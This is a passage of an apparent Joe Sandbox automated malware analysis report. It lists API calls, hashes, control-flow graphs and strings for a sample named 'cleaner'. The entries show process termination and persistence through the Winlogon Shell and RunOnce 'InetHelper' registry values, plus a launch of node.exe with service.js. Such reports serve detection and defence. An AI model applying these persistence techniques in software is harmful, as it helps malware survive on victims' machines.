                                                                                                                                                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E6B
                                                                                                                                                                                                              • CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
                                                                                                                                                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 190613189-0
                                                                                                                                                                                                              • Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                                                                                                                              • Instruction ID: 3eb9f18af2c16f81f4dc7877ab3147293eaebe45f2d41041cd024b5e05e36bdf
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4AF0C831100514AFC7029B94DD4099FBBA8DF06354B25407AE844FB211D634DF01AB98
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Callgraph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              • Opacity -> Relevance
                                                                                                                                                                                                              • Disassembly available
                                                                                                                                                                                                              callgraph 0 Function_00571000 1 Function_0057107D 1->0

                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                              Function 0057107D Relevance: 107.1, APIs: 46, Strings: 15, Instructions: 327registryprocessfileCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00571097
                                                                                                                                                                                                              • _wsplitpath.MSVCRT ref: 005710B4
                                                                                                                                                                                                              • GetCommandLineW.KERNEL32 ref: 005710BD
                                                                                                                                                                                                              • wcsstr.MSVCRT ref: 005710C9
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 005710FC
                                                                                                                                                                                                              • memset.MSVCRT ref: 00571113
                                                                                                                                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 0057112C
                                                                                                                                                                                                              • _wcsicmp.MSVCRT ref: 00571153
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000411,00000000,?), ref: 00571168
                                                                                                                                                                                                              • QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,00000104), ref: 00571188
                                                                                                                                                                                                              • _wcsicmp.MSVCRT ref: 0057119A
                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,00000009), ref: 005711A5
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 005711AC
                                                                                                                                                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 005711B7
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 005711C2
                                                                                                                                                                                                              • CreateFileW.KERNELBASE(00000000,00000002,00000000,00000000,00000002,00000080,00000000), ref: 005711F5
                                                                                                                                                                                                              • free.MSVCRT(00000000), ref: 005711FE
                                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0057120F
                                                                                                                                                                                                              • MoveFileExW.KERNELBASE(00000000,00000000,00000001), ref: 00571259
                                                                                                                                                                                                              • memset.MSVCRT ref: 0057126B
                                                                                                                                                                                                              • CreateFileW.KERNELBASE(00000000,00000002,00000003,00000000,00000002,00000080,00000000), ref: 00571295
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,00000001,00000002), ref: 005712AD
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 005712B1
                                                                                                                                                                                                              • DuplicateHandle.KERNELBASE(00000000), ref: 005712BA
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,00000001,00000002), ref: 005712C7
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 005712CB
                                                                                                                                                                                                              • DuplicateHandle.KERNELBASE(00000000), ref: 005712CE
                                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(00000000), ref: 005712D7
                                                                                                                                                                                                              • free.MSVCRT(?), ref: 005712E3
                                                                                                                                                                                                                • Part of subcall function 00571000: wcslen.MSVCRT ref: 0057101C
                                                                                                                                                                                                                • Part of subcall function 00571000: calloc.MSVCRT ref: 00571030
                                                                                                                                                                                                                • Part of subcall function 00571000: wcslen.MSVCRT ref: 0057104B
                                                                                                                                                                                                                • Part of subcall function 00571000: memcpy.MSVCRT ref: 00571061
                                                                                                                                                                                                              • free.MSVCRT(00000000), ref: 005712E6
                                                                                                                                                                                                              • memset.MSVCRT ref: 00571327
                                                                                                                                                                                                              • CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000008,00000000,?,?,?), ref: 0057134A
                                                                                                                                                                                                              • free.MSVCRT(00000000), ref: 00571351
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00571358
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0057135E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00571364
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0057136A
                                                                                                                                                                                                              • RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 005713A1
                                                                                                                                                                                                              • wcslen.MSVCRT ref: 005713AE
                                                                                                                                                                                                              • RegSetValueExW.KERNELBASE(?,Shell,00000000,00000001,00000000,00000000), ref: 005713CC
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 005713D8
                                                                                                                                                                                                              • free.MSVCRT(00000000), ref: 005713DB
                                                                                                                                                                                                              • RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00571417
                                                                                                                                                                                                              • wcslen.MSVCRT ref: 0057141E
                                                                                                                                                                                                              • RegSetValueExW.KERNELBASE(?,InetHelper,00000000,00000001,00000000,00000000), ref: 00571437
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0057143D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2227752204.0000000000571000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00570000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2227710222.0000000000570000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2227794629.0000000000572000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_570000_cleaner.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Close$HandleProcess$Create$free$CurrentFilewcslen$memset$ChangeDuplicateFindNameNotificationProcess32Value_wcsicmp$CommandFirstFullImageLineModuleMoveNextOpenQuerySnapshotTerminateToolhelp32_wsplitpathcallocmemcpywcsstr
                                                                                                                                                                                                              • String ID: <!W$<!W$InetHelper$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon$SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce$Shell$St0P$\\?\pipe\$explorer.exe,"$node.exe$node.exe" "$service.js"$service.js.lock$servicelog.prev.txt$servicelog.txt
                                                                                                                                                                                                              • API String ID: 2280789697-3573369630
                                                                                                                                                                                                              • Opcode ID: 74d31b5b39dea6700bce59dd87f112c2d7d84eb7b57f1749430ad0d9f5381f36
                                                                                                                                                                                                              • Instruction ID: 48bd99c49bc6a8596586b003faf8aaee385635e39c8aaa9f903f00f29934e804
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 74d31b5b39dea6700bce59dd87f112c2d7d84eb7b57f1749430ad0d9f5381f36
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3AA16FB2144344BFE720AB61EC8DFAB7BACFB94740F004419F749D2091EA719948EB76
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                              Function 00571000 Relevance: 5.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 26 571000-57100f 27 571011-571015 26->27 28 57102a-57103c calloc 26->28 29 571017-571028 wcslen 27->29 30 571075-57107c 28->30 31 57103e 28->31 29->28 29->29 32 571042-571073 wcslen memcpy 31->32 32->30 32->32
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2227752204.0000000000571000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00570000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2227710222.0000000000570000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2227794629.0000000000572000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_570000_cleaner.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: wcslen$callocmemcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1707914859-0
                                                                                                                                                                                                              • Opcode ID: b6ef4f21f7f996f1868b8aef62475bd8e54672a38639483deca43d463472180e
                                                                                                                                                                                                              • Instruction ID: d5bfe355ba9447d5535f5401b8f3aec03df4959e5f7e7b9cccd763f28de3039c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6ef4f21f7f996f1868b8aef62475bd8e54672a38639483deca43d463472180e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1701A1765043059FDB10CF58FC4C856BBA4EF95364F00441DE94983261EA21E848EAA1
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Callgraph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              • Opacity -> Relevance
                                                                                                                                                                                                              • Disassembly available
                                                                                                                                                                                                              callgraph 0 Function_00FE107D 1 Function_00FE1000 0->1

                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                              Function 00FE107D Relevance: 103.6, APIs: 46, Strings: 13, Instructions: 327registryprocessfileCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00FE1097
                                                                                                                                                                                                              • _wsplitpath.MSVCRT ref: 00FE10B4
                                                                                                                                                                                                              • GetCommandLineW.KERNEL32 ref: 00FE10BD
                                                                                                                                                                                                              • wcsstr.MSVCRT ref: 00FE10C9
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 00FE10FC
                                                                                                                                                                                                              • memset.MSVCRT ref: 00FE1113
                                                                                                                                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00FE112C
                                                                                                                                                                                                              • _wcsicmp.MSVCRT ref: 00FE1153
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000411,00000000,?), ref: 00FE1168
                                                                                                                                                                                                              • QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,00000104), ref: 00FE1188
                                                                                                                                                                                                              • _wcsicmp.MSVCRT ref: 00FE119A
                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,00000009), ref: 00FE11A5
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00FE11AC
                                                                                                                                                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 00FE11B7
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00FE11C2
                                                                                                                                                                                                              • CreateFileW.KERNELBASE(00000000,00000002,00000000,00000000,00000002,00000080,00000000), ref: 00FE11F5
                                                                                                                                                                                                              • free.MSVCRT(00000000), ref: 00FE11FE
                                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00FE120F
                                                                                                                                                                                                              • MoveFileExW.KERNELBASE(00000000,00000000,00000001), ref: 00FE1259
                                                                                                                                                                                                              • memset.MSVCRT ref: 00FE126B
                                                                                                                                                                                                              • CreateFileW.KERNELBASE(00000000,00000002,00000003,00000000,00000002,00000080,00000000), ref: 00FE1295
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,00000001,00000002), ref: 00FE12AD
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 00FE12B1
                                                                                                                                                                                                              • DuplicateHandle.KERNELBASE(00000000), ref: 00FE12BA
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,00000001,00000002), ref: 00FE12C7
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 00FE12CB
                                                                                                                                                                                                              • DuplicateHandle.KERNELBASE(00000000), ref: 00FE12CE
                                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00FE12D7
                                                                                                                                                                                                              • free.MSVCRT(?), ref: 00FE12E3
                                                                                                                                                                                                                • Part of subcall function 00FE1000: wcslen.MSVCRT ref: 00FE101C
                                                                                                                                                                                                                • Part of subcall function 00FE1000: calloc.MSVCRT ref: 00FE1030
                                                                                                                                                                                                                • Part of subcall function 00FE1000: wcslen.MSVCRT ref: 00FE104B
                                                                                                                                                                                                                • Part of subcall function 00FE1000: memcpy.MSVCRT ref: 00FE1061
                                                                                                                                                                                                              • free.MSVCRT(00000000), ref: 00FE12E6
                                                                                                                                                                                                              • memset.MSVCRT ref: 00FE1327
                                                                                                                                                                                                              • CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000008,00000000,?,?,?), ref: 00FE134A
                                                                                                                                                                                                              • free.MSVCRT(00000000), ref: 00FE1351
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00FE1358
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00FE135E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00FE1364
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00FE136A
                                                                                                                                                                                                              • RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00FE13A1
                                                                                                                                                                                                              • wcslen.MSVCRT ref: 00FE13AE
                                                                                                                                                                                                              • RegSetValueExW.KERNELBASE(?,Shell,00000000,00000001,00000000,00000000), ref: 00FE13CC
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00FE13D8
                                                                                                                                                                                                              • free.MSVCRT(00000000), ref: 00FE13DB
                                                                                                                                                                                                              • RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00FE1417
                                                                                                                                                                                                              • wcslen.MSVCRT ref: 00FE141E
                                                                                                                                                                                                              • RegSetValueExW.KERNELBASE(?,InetHelper,00000000,00000001,00000000,00000000), ref: 00FE1437
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00FE143D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000001D.00000002.2280747843.0000000000FE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000001D.00000002.2280711919.0000000000FE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000001D.00000002.2280779803.0000000000FE2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_fe0000_cleaner.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Close$HandleProcess$Create$free$CurrentFilewcslen$memset$ChangeDuplicateFindNameNotificationProcess32Value_wcsicmp$CommandFirstFullImageLineModuleMoveNextOpenQuerySnapshotTerminateToolhelp32_wsplitpathcallocmemcpywcsstr
                                                                                                                                                                                                              • String ID: InetHelper$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon$SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce$Shell$St0P$\\?\pipe\$explorer.exe,"$node.exe$node.exe" "$service.js"$service.js.lock$servicelog.prev.txt$servicelog.txt
                                                                                                                                                                                                              • API String ID: 2280789697-528123803
                                                                                                                                                                                                              • Opcode ID: fd6155b351da04958c64a27a99a86dbb72f9f9af5972e398f9666034766e370d
                                                                                                                                                                                                              • Instruction ID: 42149031852a0af697b6002a1aafd73dbfd514e77e8d405753135c3f94f80740
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fd6155b351da04958c64a27a99a86dbb72f9f9af5972e398f9666034766e370d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B8A184B2544388BFE360AB61DC89FAF77ADFB84750F000919F745D60D1EAB49904DB62
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                              Function 00FE1000 Relevance: 5.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 26 fe1000-fe100f 27 fe102a-fe103c calloc 26->27 28 fe1011-fe1015 26->28 30 fe103e 27->30 31 fe1075-fe107c 27->31 29 fe1017-fe1028 wcslen 28->29 29->27 29->29 32 fe1042-fe1073 wcslen memcpy 30->32 32->31 32->32
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000001D.00000002.2280747843.0000000000FE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000001D.00000002.2280711919.0000000000FE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000001D.00000002.2280779803.0000000000FE2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_fe0000_cleaner.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: wcslen$callocmemcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1707914859-0
                                                                                                                                                                                                              • Opcode ID: 309c4790d24ce5a967cb9923a981a91e472d47bea18d2f5f8027de38aec87fb8
                                                                                                                                                                                                              • Instruction ID: 29241b420e96243179a0e7e3d93170ef8e0fa83b524b6d0ca6bb11ec8f30ea88
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 309c4790d24ce5a967cb9923a981a91e472d47bea18d2f5f8027de38aec87fb8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6C01D6766043499FD710DF59EC88856BBE8FF84364B00041DFA45872A2FB31EC08DA91
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%